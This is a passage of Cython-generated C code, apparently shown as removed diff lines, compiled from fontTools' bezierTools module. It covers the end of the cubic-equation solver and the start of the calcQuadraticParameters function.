__PYX_ERR(0, 922, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x2)) __PYX_ERR(0, 922, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6)) __PYX_ERR(0, 922, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 922, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_6); - __pyx_t_6 = 0; - } - __pyx_L7:; - - /* "fontTools/misc/bezierTools.py":923 - * x1 = round(x1, epsilonDigits) - * x2 = round(x2, epsilonDigits) - * return [x0, x1, x2] # <<<<<<<<<<<<<< - * else: - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_6 = PyList_New(3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 923, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_INCREF(__pyx_v_x0); - __Pyx_GIVEREF(__pyx_v_x0); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 0, __pyx_v_x0)) __PYX_ERR(0, 923, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 1, __pyx_v_x1)) __PYX_ERR(0, 923, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 2, __pyx_v_x2)) __PYX_ERR(0, 923, __pyx_L1_error); - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":901 - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] - * elif R2_Q3 <= epsilon * 0.5: # <<<<<<<<<<<<<< - * # The epsilon * .5 above ensures that Q3 is not zero. - * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) - */ - } - - /* "fontTools/misc/bezierTools.py":925 - * return [x0, x1, x2] - * else: - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) # <<<<<<<<<<<<<< - * x = x + Q / x - * if R >= 0.0: - */ - /*else*/ { - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_R2_Q3}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = __Pyx_PyNumber_Absolute(__pyx_v_R); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyNumber_Add(__pyx_t_6, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyFloat_FromDouble((1.0 / 3.0)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyNumber_Power2(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_x = __pyx_t_6; - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":926 - * else: - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) - * x = x + Q / x # <<<<<<<<<<<<<< - * if R >= 0.0: - * x = -x - */ - __pyx_t_6 = __Pyx_PyNumber_Divide(__pyx_v_Q, __pyx_v_x); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 926, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyNumber_Add(__pyx_v_x, __pyx_t_6); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 926, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF_SET(__pyx_v_x, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":927 - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) - * x = x + Q / x - * if R >= 0.0: # <<<<<<<<<<<<<< - * x = -x - * x = round(x - a1 / 3.0, epsilonDigits) - */ - __pyx_t_3 = PyObject_RichCompare(__pyx_v_R, __pyx_float_0_0, Py_GE); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 927, __pyx_L1_error) - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 927, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":928 - * x = x + Q / x - * if R >= 0.0: - * x = -x # <<<<<<<<<<<<<< - * x = round(x - a1 / 3.0, epsilonDigits) - * return [x] - */ - __pyx_t_3 = PyNumber_Negative(__pyx_v_x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 928, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF_SET(__pyx_v_x, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":927 - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) - * x = x + Q / x - * if R >= 0.0: # <<<<<<<<<<<<<< - * x = -x - * x = round(x - a1 / 3.0, epsilonDigits) - */ - } - - /* "fontTools/misc/bezierTools.py":929 - * if R >= 0.0: - * x = -x - * x = round(x - a1 / 3.0, epsilonDigits) # <<<<<<<<<<<<<< - * return [x] - * - */ - __pyx_t_3 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_a1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = PyNumber_Subtract(__pyx_v_x, __pyx_t_3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_6)) __PYX_ERR(0, 929, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 929, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_1, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF_SET(__pyx_v_x, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":930 - * x = -x - * x = round(x - a1 / 3.0, epsilonDigits) - * return [x] # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 930, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_v_x)) __PYX_ERR(0, 930, __pyx_L1_error); - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":841 - * - * - * def solveCubic(a, b, c, d): # <<<<<<<<<<<<<< - * """Solve a cubic equation. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("fontTools.misc.bezierTools.solveCubic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a1); - __Pyx_XDECREF(__pyx_v_a2); - __Pyx_XDECREF(__pyx_v_a3); - __Pyx_XDECREF(__pyx_v_Q); - __Pyx_XDECREF(__pyx_v_R); - __Pyx_XDECREF(__pyx_v_R2); - __Pyx_XDECREF(__pyx_v_Q3); - __Pyx_XDECREF(__pyx_v_R2_Q3); - __Pyx_XDECREF(__pyx_v_x); - __Pyx_XDECREF(__pyx_v_theta); - __Pyx_XDECREF(__pyx_v_rQ2); - __Pyx_XDECREF(__pyx_v_a1_3); - __Pyx_XDECREF(__pyx_v_x0); - __Pyx_XDECREF(__pyx_v_x1); - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":938 - * - * - * def calcQuadraticParameters(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_51calcQuadraticParameters(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_50calcQuadraticParameters, "calcQuadraticParameters(pt1, pt2, pt3)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_51calcQuadraticParameters = {"calcQuadraticParameters", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_51calcQuadraticParameters, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_50calcQuadraticParameters}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_51calcQuadraticParameters(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticParameters (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 938, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 938, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticParameters", 1, 3, 3, 1); __PYX_ERR(0, 938, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 938, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticParameters", 1, 3, 3, 2); __PYX_ERR(0, 938, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticParameters") < 0)) __PYX_ERR(0, 938, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticParameters", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 938, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticParameters", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_50calcQuadraticParameters(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_50calcQuadraticParameters(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3) { - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_v_y2 = NULL; - PyObject *__pyx_v_x3 = NULL; - PyObject *__pyx_v_y3 = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticParameters", 1); - - /* "fontTools/misc/bezierTools.py":939 - * - * def calcQuadraticParameters(pt1, pt2, pt3): - * x2, y2 = pt2 # <<<<<<<<<<<<<< - * x3, y3 = pt3 - * cx, cy = pt1 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt2))) || (PyList_CheckExact(__pyx_v_pt2))) { - PyObject* sequence = __pyx_v_pt2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 939, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 939, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 939, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 939, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 939, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 939, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_x2 = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_y2 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":940 - * def calcQuadraticParameters(pt1, pt2, pt3): - * x2, y2 = pt2 - * x3, y3 = pt3 # <<<<<<<<<<<<<< - * cx, cy = pt1 - * bx = (x2 - cx) * 2.0 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt3))) || (PyList_CheckExact(__pyx_v_pt3))) { - PyObject* sequence = __pyx_v_pt3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 940, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 940, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 940, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 940, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 940, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 940, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_x3 = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_y3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":941 - * x2, y2 = pt2 - * x3, y3 = pt3 - * cx, cy = pt1 # <<<<<<<<<<<<<< - * bx = (x2 - cx) * 2.0 - * by = (y2 - cy) * 2.0 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt1))) || (PyList_CheckExact(__pyx_v_pt1))) { - PyObject* sequence = __pyx_v_pt1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 941, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 941, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 941, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 941, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 941, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 941, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_cy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":942 - * x3, y3 = pt3 - * cx, cy = pt1 - * bx = (x2 - cx) * 2.0 # <<<<<<<<<<<<<< - * by = (y2 - cy) * 2.0 - * ax = x3 - cx - bx - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_x2, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 942, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 942, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_bx = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":943 - * cx, cy = pt1 - * bx = (x2 - cx) * 2.0 - * by = (y2 - cy) * 2.0 # <<<<<<<<<<<<<< - * ax = x3 - cx - bx - * ay = y3 - cy - by - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_y2, __pyx_v_cy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 943, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_2_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 943, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_by = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":944 - * bx = (x2 - cx) * 2.0 - * by = (y2 - cy) * 2.0 - * ax = x3 - cx - bx # <<<<<<<<<<<<<< - * ay = y3 - cy - by - * return (ax, ay), (bx, by), (cx, cy) - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_x3, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 944, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 944, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_ax = __pyx_t_1; - 